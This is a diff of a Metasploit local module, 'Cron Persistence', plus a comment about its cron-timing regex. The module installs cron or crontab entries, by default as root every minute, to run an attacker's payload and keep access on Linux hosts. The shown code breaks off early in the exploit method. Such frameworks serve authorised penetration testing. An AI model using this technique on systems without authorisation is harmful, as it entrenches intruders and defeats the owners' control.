modules/exploits/linux/local/cron_persistence.rb

```diff
@@ -0,0 +1,138 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/post/file'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Cron Persistence',
+        'Description'    => %q(
+          This module will create a cron or crontab entry to execute a payload.
+          The module includes the ability to automatically clean up those entries to prevent multiple executions.
+          syslog will get a copy of the cron entry.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'h00die <mike@shorebreaksecurity.com>'
+          ],
+        'Platform'       => ['unix', 'linux'],
+        'Targets'        =>
+          [
+            [ 'Cron',           { 'path' => '/etc/cron.d' } ],
+            [ 'User Crontab',   { 'path' => '/var/spool/cron' } ],
+            [ 'System Crontab', { 'path' => '/etc' } ]
+          ],
+        'DefaultTarget'  => 1,
+        'Arch'           => ARCH_CMD,
+        'Payload'        =>
+        {
+          'BadChars'   => "#%\x10\x13", # % always seems to fail, # is for comments
+          'Compat'     =>
+          {
+            'PayloadType'  => 'cmd',
+            'RequiredCmd'  => 'generic perl ruby python'
+          }
+        },
+        'DefaultOptions' => { 'WfsDelay' => 90 },
+        'DisclosureDate' => "Jul 1 1979" # Version 7 Unix release date (first cron implementation)
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [false, 'User to run cron/crontab as', 'root']),
+        OptString.new('TIMING', [false, 'cron timing.  Changing will require WfsDelay to be adjusted', '* * * * *']),
+        OptBool.new('CLEANUP', [true, 'delete cron entry after execution', true])
+      ], self.class
+    )
+  end
+
+  def exploit
+    # https://gist.github.com/istvanp/310203 for cron regex validator
+    cron_regex = '(\*|[0-5]?[0-9]|\*\/[0-9]+)\s+'
+    cron_regex << '(\*|1?[0-9]|2[0-3]|\*\/[0-9]+)\s+'
+    cron_regex << '(\*|[1-2]?[0-9]|3[0-1]|\*\/[0-9]+)\s+'
+    cron_regex << '(\*|[0-9]|1[0-2]|\*\/[0-9]+|jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec)\s+'
+    cron_regex << '(\*\/[0-9]+|\*|[0-7]|sun|mon|tue|wed|thu|fri|sat)' # \s*
+    # cron_regex << '(\*\/[0-9]+|\*|[0-9]+)?'
```

Comment:
I noticed some systems have 5 date/time items, some have 6.  So I wanted to capture that the github has 6 items, but we dont need the last one, at least in all cases i tested.